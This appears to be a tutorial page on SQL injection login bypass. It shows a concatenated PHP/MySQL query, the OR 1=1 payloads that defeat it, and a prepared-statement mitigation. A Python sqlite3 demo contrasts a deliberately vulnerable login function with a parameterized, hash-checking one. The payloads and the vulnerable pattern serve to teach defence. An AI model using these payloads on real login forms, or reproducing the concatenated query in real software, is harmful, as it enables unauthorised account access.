API - SQL Login Page Bypass
SQL login page bypass using an injected OR condition: when user input is concatenated into the query, a quote in the input ends the string literal and the rest of the input is parsed as SQL, so an always-true condition makes the WHERE clause match a row.
Vulnerable Query (user input concatenated directly into the SQL string):
SELECT * FROM users
WHERE username = '$username'
AND password = '$password';
Payload 1 - $password = 'a' or 1='1' => injected value: a' or 1='1
Payload 2 - $password = 'a' or 1=1#' => injected value: a' or 1=1#
Resulting query with Payload 2 (in MySQL, # starts a comment, so the original closing quote is ignored and OR 1=1 makes the condition true for every row):
SELECT * FROM users
WHERE username = 'someone'
AND password = 'a' OR 1=1#';
Mitigation:
1. Use Prepared Statements / Parameterized Queries
// $pdo is an existing PDO connection; $username and $password come from the request.
$username = "alice"; // dynamic value, but bound as data rather than spliced into the SQL text
$stmt = $pdo->prepare("SELECT id, password_hash FROM users WHERE username = ?"); // query text is fixed: no concatenation of user input into the SQL
$stmt->execute([$username]);
$row = $stmt->fetch();
// The password is verified in application code against the stored hash, not compared inside the query.
$ok = $row && password_verify($password, $row['password_hash']);
Sample Payload Inject:
$username = "alice' OR 1=1 --";
Sample Output (the driver sends the value separately from the query text, or escapes it under emulated prepares; either way it is compared as this literal string and never parsed as SQL):
SELECT id, password_hash FROM users
WHERE username = 'alice\' OR 1=1 --'; // the injected text is treated as a string value, not as code, so no row matches and the query does not bypass the login.
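The following is an added example written for this page, not code from the original post. It uses Python's sqlite3 module as a stand-in for the MySQL-style setup above (SQLite treats -- as a comment but not #, so the payload exercised here is the one from "Sample Payload Inject"). The table, the user, the plaintext password column and the fixed salt are all constructed for the demonstration: login_vulnerable reproduces the query shape from the top of the page, and login_parameterized reproduces the mitigation (username bound as a parameter, password verified in application code against a stored hash).

```python
import hashlib
import hmac
import sqlite3

# Constructed, fixed salt so the example is deterministic (a real system
# generates a random salt per user and stores it with the hash).
SALT = b"constructed-fixed-salt"


def hash_password(password: str) -> str:
    """PBKDF2-HMAC-SHA256 of the password, hex encoded."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000).hex()


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database with one constructed user.

    The plaintext `password` column exists only so the vulnerable query from
    the page can be reproduced; the parameterized path uses `password_hash`.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, "
        "password TEXT, password_hash TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password, password_hash) VALUES (?, ?, ?)",
        ("alice", "correct-horse", hash_password("correct-horse")),
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The page's vulnerable query: inputs spliced into the SQL text.

    A quote in either input closes the string literal, and whatever follows
    is parsed as SQL. Kept deliberately vulnerable as the 'before' case.
    """
    sql = (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The page's mitigation: fixed query text, username bound as a parameter,
    password checked in application code against the stored hash."""
    row = conn.execute(
        "SELECT id, password_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    # Constant-time comparison of the two hex digests.
    return hmac.compare_digest(row[1], hash_password(password))


if __name__ == "__main__":
    conn = make_db()
    payload = "alice' OR 1=1 --"  # the page's "Sample Payload Inject" value
    print("vulnerable query, payload in username:", login_vulnerable(conn, payload, "wrong"))
    print("parameterized query, same payload:   ", login_parameterized(conn, payload, "wrong"))
    print("parameterized query, real credentials:", login_parameterized(conn, "alice", "correct-horse"))
```

Running it shows the concatenated query accepting the injected username with a wrong password, while the parameterized version looks up the literal string "alice' OR 1=1 --", finds no such user and rejects the login; only the real credentials succeed.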